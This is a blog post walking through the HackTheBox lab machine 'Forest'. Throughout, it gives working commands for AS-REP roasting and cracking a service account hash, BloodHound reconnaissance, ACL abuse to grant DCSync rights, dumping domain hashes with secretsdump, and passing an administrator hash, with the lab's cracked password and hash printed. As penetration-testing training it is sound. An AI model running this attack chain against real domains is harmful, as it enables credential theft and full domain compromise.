DEV Community

Finn
Finn

Posted on

Forest - 10.10.10.161 - hackthebox.eu - Writeup - Road to OSCP #2

Alt Text

Welcome to my writeup of the hackthebox.eu machine Forest

This machine is rated easy difficulty and involved abusing kerberos pre-authentication to kerberoast a hash of a local service account using the impacket script GetNPUsers. Root required using bloodhound to visualize the AD environment and find a path to the domain admin, which included abusing ACL's to get DCSync rights.

1. Recon

As usual we will start with an nmap scan of the target machine.
nmap -sC -sV -oA nmap/scan 10.10.10.161
Alt Text
The ports of note here are:

  • 445 - SMB
  • 88 - Kerberos
  • 135 - RPC
  • 5985 - Powershell - WSMan - Remote Management

Knowing that we have rpc open we can try null authentication to get a list of user accounts
rpcclient -U "" -N 10.10.10.161 enumdomusers
Alt Text

  • One account is of particular interest as is starts with svc which indicates it may be a service account which would mean we can abuse its special permissions relating to local groups and users
  • We can attempt to kerberoast this user to try and get a hash we can crack

2. Exploitation to User

Clone the Impacket repo and navigate into the examples folder
Alt Text

Now try try attacking the svc-alfresco account:

  • If you remember from the nmap scan the domain was htb.local ./GetNPUsers.py htb.local/svc-alfresco -format john -dc-ip 10.10.10.161 Alt Text Bingo! We now have the asrep hash of the user svc-alfresco and we can crack is using johntheripper
  • First place the hash in a file called hash.txt
  • Run john -w=/usr/share/wordlists/rockyou.txt hash.txt Alt Text
  • We now have the password of the user svc-alfresco - s3rvice

Now we can login to the powershell remote management port using a tool called Evil-WinRM
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Alt Text

Now that we have a shell we can also grab user.txt
Alt Text

3. Priv Esc from User to Domain Admin

  • For this priv esc we will use a tool called bloodhound to visualise the Active Directory environment - follow this guide on how to set it up on your system BloodHound Wiki

To begin we need to initialize the neo4j database, you can do this by running: neo4j console
Alt Text

Now that the db has been launched we can launch blood hound by running bloodhound in a terminal
Alt Text

Now that bloodhound is running, we need some data to analyze, we can use the SharpHound.exe file and the upload and download capabilities of Evil-WinRM to get the files.
Open a new terminal and download the SharpHound.exe file from github
https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.exe
Alt Text

Now in your Evil-WinRM terminal type: upload SharpHound.exe
Alt Text

Now we can run the file with the -c All flag to to specify we wan't to collect all data on the AD environment
.\SharpHound.exe -c All
Alt Text

ls download 20200506091425_BloodHound.zip
Alt Text

We now have the bloodhound zip file on our local machine so we can open it in bloodhound by dragging it into the window
Alt Text

  • You should now see that we have a lot of data in our database

Now we can run one of the pre-made queries Shortest Paths to Unconstrained Delegation Systems
Alt Text
There are a few things that we can see now:

  • We are part of the privileged IT group and as a result part of Account Operators can be a member Exchange Windows Permissions and Exchange Trusted Subsystem Group
  • Firstly, this means that we can add ourselves to Exchange Windows Permissions and Exchange Trusted Subsystem Group
  • This also means we can abuse ACL (Access Control List) to allow svc-alfresco to perform a DCSync attack to get the admin hash, here is a good video that explains this, Here

Let's try adding ourselves to this group new group:
net group "Exchange Windows Permissions" svc-alfresco /add
Alt Text

We can also add ourselves to the Exchange Trusted Subsystem Group which will allow us to abuse ACL
Add-ADGroupMember -Identity "Exchange Trusted Subsystem" -Members svc-alfresco
Alt Text

We can now use a tool called aclpwn to give svc-alfresco DCSync rights. There is an article here that describes it's usage very well - ACLPWN Blog

  1. Lets install aclpwn in kali, it's as simple as pip install aclpwn
    Alt Text

  2. Lets execute this command to give us DCSync permissions
    aclpwn -f svc-alfresco -ft user -d htb.local -s 10.10.10.161 and use option 1
    Alt Text

  3. Now we can use impacket's secretsdump.py to get the admin hash
    secretsdump.py htb.local/svc-alfresco:s3rvice@10.10.10.161 -dc-ip 10.10.10.161
    Alt Text

Bingo! We now have the admin hash

We can use this to logon using Evil-WinRM with the -H flag and grab root.txt
evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Alt Text

Rooted!

If you enjoyed my write up or found it useful check you my htb profile linked below

HTB

Top comments (0)